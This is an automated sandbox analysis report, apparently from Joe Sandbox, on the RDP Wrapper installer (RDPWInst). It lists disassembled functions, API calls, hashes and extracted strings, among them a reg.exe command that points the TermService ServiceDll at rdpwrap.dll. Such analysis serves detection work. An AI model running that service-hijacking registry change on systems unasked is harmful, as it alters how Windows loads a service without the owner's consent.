                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$CloseFlush
                                                    • String ID: $sD$ImagePath$ServiceDll$[*] ImagePath: "$[*] ServiceDll: "$[-] Another third-party TermService library is installed.$[-] OpenKeyReadOnly error (code $[-] TermService is hosted in a custom application (BeTwin, etc.) - unsupported.$\SYSTEM\CurrentControlSet\Services\TermService$\SYSTEM\CurrentControlSet\Services\TermService\Parameters$rdpwrap.dll$svchost -k$svchost.exe$termsrv.dll
                                                    • API String ID: 1149308822-2563127478
                                                    • Opcode ID: 3e349bb9003ee561f3f41bf2c4cd298ce689c8a6cca98ee662a00d79e13e63ec
                                                    • Instruction ID: 1ac512ede3db6dba28468dccd327cdb8adfd53dd4df03d49c6afb8088628474e
                                                    • Opcode Fuzzy Hash: 3e349bb9003ee561f3f41bf2c4cd298ce689c8a6cca98ee662a00d79e13e63ec
                                                    • Instruction Fuzzy Hash: 01515774B442005BD700FBBA8D4255EB2659F8930CB51A43FB840BB796CB3CEC158AAF
                                                    Function 00408C28 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77stringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000,004095BB), ref: 00408C46
                                                    • LeaveCriticalSection.KERNEL32(00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000), ref: 00408C6A
                                                    • LeaveCriticalSection.KERNEL32(00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000), ref: 00408C79
                                                    • IsValidLocale.KERNEL32(00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000), ref: 00408C8D
                                                    • EnterCriticalSection.KERNEL32(00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?), ref: 00408CEA
                                                    • lstrcpynW.KERNEL32(en-GB,en,en-US,,00000000,000000AA,00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540), ref: 00408D08
                                                    • LeaveCriticalSection.KERNEL32(00449B54,en-GB,en,en-US,,00000000,000000AA,00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000), ref: 00408D12
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$Leave$Enter$LocaleValidlstrcpyn
                                                    • String ID: en-GB,en,en-US,
                                                    • API String ID: 1058953229-3021119265
                                                    • Opcode ID: f5c0c5a953935993f8144897554dda3b04a66e7f6cf498fae83c5be40df86a5b
                                                    • Instruction ID: 9b1ce77b3c0781b783b438d4c88a1dd796634ce3a4aca31124bb85a30b48e6d3
                                                    • Opcode Fuzzy Hash: f5c0c5a953935993f8144897554dda3b04a66e7f6cf498fae83c5be40df86a5b
                                                    • Instruction Fuzzy Hash: B321AE203042556AEB50B77A9E57B6A2169EF4570CF60443FB481B72D2CEBCAC04E22E
                                                    Function 0043C1C8 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 53COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • OpenProcess.KERNEL32(00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1CF
                                                    • GetLastError.KERNEL32(00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1DA
                                                    • TerminateProcess.KERNEL32(00000000,00000000,00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000), ref: 0043C219
                                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C223
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C228
                                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C265
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseErrorHandleLastProcess$OpenTerminate
                                                    • String ID: $sD$[-] OpenProcess error (code $[-] TerminateProcess error (code
                                                    • API String ID: 1809907545-775158141
                                                    • Opcode ID: 6f554e20b072eb6f5660c25ac1f2be49616fb729524d0b6480b7b10d1be33d93
                                                    • Instruction ID: c032a40b630c9990863936c46c82d74717666648ea03c3b6a4bb658b84b7f9ba
                                                    • Opcode Fuzzy Hash: 6f554e20b072eb6f5660c25ac1f2be49616fb729524d0b6480b7b10d1be33d93
                                                    • Instruction Fuzzy Hash: EB01F6A5B442111AE610B3FB0D82B2F255A8F8A75CF02917FB504B62D7CA3C9C11977F
                                                    Function 0040472C Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1537 40472c-404740 1538 404742-404743 1537->1538 1539 40474d-404763 1537->1539 1541 404765-404774 1538->1541 1542 404745-404746 1538->1542 1540 40478c-40479f 1539->1540 1546 4047a5-4047bd CreateFileW 1540->1546 1547 404857-404874 1540->1547 1545 404785 1541->1545 1543 404776-404780 1542->1543 1544 404748 1542->1544 1543->1545 1548 4048b5-4048b6 1544->1548 1545->1540 1551 4047c3-4047cb 1546->1551 1552 4048cb-4048d6 GetLastError 1546->1552 1549 404876-404878 1547->1549 1550 40487a-404880 1547->1550 1553 404888-404890 GetStdHandle 1549->1553 1554 404882-404884 1550->1554 1555 404886 1550->1555 1556 4047d1-4047df GetFileSize 1551->1556 1557 404894-40489a 1551->1557 1552->1548 1553->1552 1559 404892 1553->1559 1554->1553 1555->1553 1556->1552 1558 4047e5-4047ea 1556->1558 1560 4048b3 1557->1560 1561 40489c-4048a5 GetFileType 1557->1561 1562 4047ec 1558->1562 1563 4047ee-4047fb SetFilePointer 1558->1563 1559->1557 1560->1548 1564 4048b7-4048c9 CloseHandle 1561->1564 1565 4048a7-4048aa 1561->1565 1562->1563 1563->1552 1566 404801-40481d ReadFile 1563->1566 1564->1548 1565->1560 1567 4048ac 1565->1567 1566->1552 1568 404823 1566->1568 1567->1560 1569 404825-404827 1568->1569 1569->1557 1570 404829-404831 1569->1570 1571 404833-404834 1570->1571 1572 404836-404845 SetFilePointer 1570->1572 1571->1569 1572->1552 1573 40484b-404853 SetEndOfFile 1572->1573 1573->1552 1574 404855 1573->1574 1574->1557
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047B5
                                                    • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047D9
                                                    • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047F5
                                                    • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00404816
                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0040483F
                                                    • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 0040484D
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404888
                                                    • GetFileType.KERNEL32(?,000000F5), ref: 0040489E
                                                    • CloseHandle.KERNEL32(?,?,000000F5), ref: 004048B9
                                                    • GetLastError.KERNEL32(000000F5), ref: 004048D1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                    • String ID:
                                                    • API String ID: 1694776339-0
                                                    • Opcode ID: 88c077e9ec81b413e44c4e0d06344b1548c794062b539f639d5ca81acda773dd
                                                    • Instruction ID: de0dc4671a2c55deed7a27a48df34c8c3110be8be3acd5b577aa359944728292
                                                    • Opcode Fuzzy Hash: 88c077e9ec81b413e44c4e0d06344b1548c794062b539f639d5ca81acda773dd
                                                    • Instruction Fuzzy Hash: EA4183B5500A40A9E730BF24C90972376E4EBC0714F20CE3FE692B66D0E7BDA845878D
                                                    Function 0043C31C Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 70processsynchronizationCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C37B
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C384
                                                    • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C3BB
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC), ref: 0043C3C6
                                                    • CloseHandle.KERNEL32(?,?,000000FF,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC), ref: 0043C3CF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseHandle$CreateErrorLastObjectProcessSingleWait
                                                    • String ID: $sD$D$[-] CreateProcess error (code:
                                                    • API String ID: 1377960556-1026335874
                                                    • Opcode ID: 58e4cee0019deaf83b36aa1437f8aa0207d0818498334e5e25efdc6c94b6a7a4
                                                    • Instruction ID: 1d017b2d671d3512e5dabab7732e068b99e5a835ee42228d460eb482b244bc14
                                                    • Opcode Fuzzy Hash: 58e4cee0019deaf83b36aa1437f8aa0207d0818498334e5e25efdc6c94b6a7a4
                                                    • Instruction Fuzzy Hash: D21151B0644204AADB00F7E5CD82F9E77B89F49714F61453BF610F61D2D67CA910972E
                                                    Function 00403028 Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNEL32(00000000,?,?,00000000,00402C9A), ref: 004030BE
                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,00402C9A), ref: 004030D8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 93a1e75d392f98f45c217d5d1b4a4ce21d939f5f7de44ee49ef913328a692d58
                                                    • Instruction ID: 8e11df8688fcfc32dba15f0401baaa5f3e1cf13b6ab2085a37f93781684c6a2f
                                                    • Opcode Fuzzy Hash: 93a1e75d392f98f45c217d5d1b4a4ce21d939f5f7de44ee49ef913328a692d58
                                                    • Instruction Fuzzy Hash: 9F7115312052009FD715CF69CE89726BFE4AB89315F14827FD444AB3D6D7B889458789
                                                    Function 0043C598 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,0043C716,?,?,?,00447324,00000000,00000000,00000000,?,00443BC6,00000000,00443FB2), ref: 0043C600
                                                    Strings
                                                    • $sD, xrefs: 0043C60D
                                                    • %SystemRoot%, xrefs: 0043C682
                                                    • ServiceDll, xrefs: 0043C650
                                                    • " /f, xrefs: 0043C69A
                                                    • [-] OpenKey error (code , xrefs: 0043C612
                                                    • \system32\reg.exe" add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d ", xrefs: 0043C68F
                                                    • \SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043C5EF
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: " /f$$sD$%SystemRoot%$ServiceDll$[-] OpenKey error (code $\SYSTEM\CurrentControlSet\Services\TermService\Parameters$\system32\reg.exe" add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "
                                                    • API String ID: 1452528299-2956723230
                                                    • Opcode ID: 0c5b84642f90c2c43a864384322aaebdce3b992f712f0d9bf057b86ee0e3b406
                                                    • Instruction ID: 86ae2d0f633f2b7d457566c29c3046f730a81976c8e7ce91198a0ccb689aa4bb
                                                    • Opcode Fuzzy Hash: 0c5b84642f90c2c43a864384322aaebdce3b992f712f0d9bf057b86ee0e3b406
                                                    • Instruction Fuzzy Hash: B331DE74A04204AFDB10FB66CC82A2E77A5DB4D308F61A07BF800B7291CB3CAD049B5D
                                                    Function 00402CA4 Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNEL32(00000000,?,00402C72), ref: 00402D5B
                                                    • Sleep.KERNEL32(0000000A,00000000,?,00402C72), ref: 00402D71
                                                    • Sleep.KERNEL32(00000000,?,?,?,00402C72), ref: 00402D9F
                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,?,00402C72), ref: 00402DB5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 50f8b12719e1c4c784f8227bf124f2ef405a8e2e831e3cb3860c1e75e50a0c63
                                                    • Instruction ID: 31c3f393645164f4675e576557a9223240219fe3669f0ad713ca74d6ded16897
                                                    • Opcode Fuzzy Hash: 50f8b12719e1c4c784f8227bf124f2ef405a8e2e831e3cb3860c1e75e50a0c63
                                                    • Instruction Fuzzy Hash: B4C147766052518FD715CF28DE8831ABBE0AB86314F1882BFD444BB3D5C7B89946CBD8
                                                    Function 0040941C Relevance: 6.1, APIs: 4, Instructions: 118stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpynW.KERNEL32(?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409497
                                                    • lstrlenW.KERNEL32(?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 004094A3
                                                    • GetUserDefaultUILanguage.KERNEL32(?,?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409530
                                                    • GetSystemDefaultUILanguage.KERNEL32(?,?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 0040955C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DefaultLanguage$SystemUserlstrcpynlstrlen
                                                    • String ID:
                                                    • API String ID: 3749826553-0
                                                    • Opcode ID: d710f7c1299fe0245be1f89c25ed315f3e3ffeabd22d09ed061d9454a6b695c6
                                                    • Instruction ID: 670d7e8fee0ffa615f00d819e5c077188fbd82142d60affd8ce3058b6d31cf6a
                                                    • Opcode Fuzzy Hash: d710f7c1299fe0245be1f89c25ed315f3e3ffeabd22d09ed061d9454a6b695c6
                                                    • Instruction Fuzzy Hash: 37416571A002195ED721EB6ADC8978EB3B4EF48304F5005BAE448B72D2DB789E908E58
                                                    Function 004040B4 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00404194,0040A1B9,00000000,0040A1E0), ref: 004040D2
                                                    • VirtualFree.KERNEL32(00449AC8,00000000,00008000,?,00000000,00008000,?,?,?,?,00404194,0040A1B9,00000000,0040A1E0), ref: 0040412F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeVirtual
                                                    • String ID: $zD$xPD
                                                    • API String ID: 1263568516-535612291
                                                    • Opcode ID: ee1e8e4c5ce6b12cd624387e406e1cf1ad3c0fb6f8253ccd4ae2b310545238de
                                                    • Instruction ID: 63e96df57fdc30e3e5434cdd8ac4306be2e0fcd0727744789414a485f14a8afc
                                                    • Opcode Fuzzy Hash: ee1e8e4c5ce6b12cd624387e406e1cf1ad3c0fb6f8253ccd4ae2b310545238de
                                                    • Instruction Fuzzy Hash: CF1161B13012009FDB248F059985B26BAE5EBC4714F55C0BEE309AF3C2D679EC01CB58
                                                    Function 00438B0C Relevance: 4.6, APIs: 3, Instructions: 150registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438B85
                                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438BFB
                                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00438C6C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Open
                                                    • String ID:
                                                    • API String ID: 71445658-0
                                                    • Opcode ID: 56a7ec8d88e5670b99992fed871dbba86343d1eb3cba1c9f5227469b2a4bb512
                                                    • Instruction ID: 3681a8d3f24b20706dc106850b3bb9ce640454c4e8124a7cc358b0d46e7adf70
                                                    • Opcode Fuzzy Hash: 56a7ec8d88e5670b99992fed871dbba86343d1eb3cba1c9f5227469b2a4bb512
                                                    • Instruction Fuzzy Hash: 1F51A370B00344AFDB11EBA5C842B9EF7F9AB48304F11547EB444A3282CA7DAF069759
                                                    Function 00406220 Relevance: 4.6, APIs: 3, Instructions: 79threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                    • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                    • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                      • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                      • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                      • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                      • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
